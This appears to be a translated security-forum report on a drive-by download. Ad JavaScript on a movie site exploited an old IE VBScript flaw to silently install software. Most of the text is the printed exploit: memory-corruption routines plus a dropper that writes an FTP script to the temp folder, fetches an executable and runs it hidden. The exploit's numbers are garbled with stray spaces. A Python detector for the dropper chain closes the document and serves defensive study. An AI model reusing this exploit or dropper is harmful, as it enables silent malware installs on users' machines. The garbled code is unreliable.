ID MYHACK58:62201557629
Type myhack58
Reporter Anonymous
Modified 2015-01-02T00:00:00


I was using Baidu browser in IE compatibility mode to browse the movie site http://www.dy2018.com, and found that it somehow ran a game client called “Shine micro-end”. I then used smartsniff to capture and analyze the packets, and when viewing the source I found a 2529 net Union js advertising code, which is the latest published 18-year-old IE vulnerability! Referencing this js downloads kuaidu_2_23_01.exe from its ftp and runs it!

Visit http://www.2529.com/page/ms.js and you can see this js code. Using IE to access www.dy2018.com, or referencing this js directly, will automatically install light micro end on the computer.

function runmumaa() On Error Resume Next Set objWsh = CreateObject("Wscript. Shell")

objWsh. run "cmd.exe /c del /F %temp%\ftp.txt & echo open>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo user>>%temp%\ftp. txt&echo anonymous>>%temp%\ftp. txt&echo testpass>>%temp%\ftp. txt&echo get kuaidu_2_23_01.exe>>%temp%\ftp.txt & echo bye>>%temp%\ftp.txt ",0,true

objWsh. run "cmd.exe /c cd %temp% & ftp-s:""%temp%\ftp.txt""",0,true

wscript. sleep 1 0 0 0

objWsh. run """%temp%\kuaidu_2_23_01.exe""",0,true

document. write(Err. Description) end function

dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray


function Begin() On Error Resume Next info=Navigator. UserAgent

if(instr(info,"Win64")>0) then exit function end if

if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function

end if


BeginInit() If Create()=True Then myarray= chrw(0 1)&chrw(2 1 7 6)&chrw(0 1)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0) myarray=myarray&chrw(0 0)&chrw(3 2 7 6 7)&chrw(0 0)&chrw(0)

if(intVersion<4) then document. write("<br> IE") document. write(intVersion) runshellcode() else setnotsafemode() end if end if end function

function BeginInit() Randomize() redim aa(5) redim ab(5) a0=1 3+1 7rnd(6) a3=7+3rnd(5) end function

function Create() On Error Resume Next dim i Create=False For i = 0 To 4 0 0 If Over()=True Then 'document. write(i) Create=True Exit For End If Next end function

sub testaa() end sub

function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2)

ab(0)=0 aa(a1)=i ab(0)=6.36598737437801 E-3 1 4

aa(a1+2)=myarray ab(2)=1.74088534731324 E-3 1 0 mydata=aa(a1) redim Preserve aa(a0) end function

function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+1, 6) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=1 4) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0)

j=0 j=readmemo(i+&h120+k)

Exit for end if

next ab(2)=1.69759663316747 E-3 1 3 runmumaa() end function

function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000

redim Preserve aa(a0) redim ab(a0)

redim Preserve aa(a2)

type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=1 0

If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)1 6 j=vartype(aa(a1-1)) if((j=mem+4) or (j8=mem+8)) thenif(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function

end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if

If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If

redim Preserve aa(a0)

end function

function ReadMemo(add) On Error Resume Next redim Preserve aa(a2)

ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747 E-3 1 3 ReadMemo=lenb(aa(a1))


redim Preserve aa(a0) end function
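
The runmumaa stage above leaves a distinctive process trail: cmd.exe echoing FTP commands into %temp%\ftp.txt, ftp started with -s: on that file, then the fetched exe launched. The following detection over process-creation command lines is an added example, not part of the original post; the sample events, the function names and the host ftp.example.invalid are constructed for illustration.

```python
import re

# Constructed process-creation command lines (Sysmon ID 1 / 4688 style), in time order.
# ftp.example.invalid is a placeholder; the page does not show the FTP host.
SAMPLE_EVENTS = [
    r'cmd.exe /c del /F %temp%\ftp.txt & echo open ftp.example.invalid>>%temp%\ftp.txt'
    r' & echo user>>%temp%\ftp.txt & echo anonymous>>%temp%\ftp.txt'
    r' & echo get kuaidu_2_23_01.exe>>%temp%\ftp.txt & echo bye>>%temp%\ftp.txt',
    r'cmd.exe /c cd %temp% & ftp -s:"%temp%\ftp.txt"',
    r'"%temp%\kuaidu_2_23_01.exe"',
    r'cmd.exe /c echo build finished>>C:\logs\build.txt',  # benign redirect
]

ECHO_RE = re.compile(r'echo\s+([^>&|]*?)\s*>>?\s*"?([^\s"&|]+)', re.I)
FTP_RE = re.compile(r'\bftp(?:\.exe)?\s+(?:-\w+\s+)*-s:"?([^\s"]+)', re.I)
FTP_VERBS = {"open", "user", "get", "bin", "binary", "bye", "quit"}

def norm(path):
    return path.strip('"').lower()

def image_name(cmdline):
    """Base name of the program a command line starts."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)).rsplit("\\", 1)[-1].lower() if m else ""

def detect_ftp_dropper(events):
    """Return (stage, detail) findings for the echo -> ftp -s: -> run chain."""
    scripts = {}     # script path -> file names it requests with "get"
    fetched = set()  # names downloaded by an ftp run that used a tracked script
    findings = []
    for cmdline in events:
        touched = set()
        for text, target in ECHO_RE.findall(cmdline):
            words = text.lower().split()
            if words and words[0] in FTP_VERBS:
                names = scripts.setdefault(norm(target), set())
                touched.add(norm(target))
                if words[0] == "get" and len(words) > 1:
                    names.add(words[1])
        findings += [("ftp_script_written", t) for t in sorted(touched)]
        m = FTP_RE.search(cmdline)
        if m and norm(m.group(1)) in scripts:
            fetched |= scripts[norm(m.group(1))]
            findings.append(("ftp_script_run", norm(m.group(1))))
        if image_name(cmdline) in fetched:
            findings.append(("payload_executed", image_name(cmdline)))
    return findings

if __name__ == "__main__":
    for finding in detect_ftp_dropper(SAMPLE_EVENTS):
        print(finding)
```

Correlating the three stages keeps the rule quiet on ordinary echo redirects and on legitimate ftp use that does not run a script assembled from the command line.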

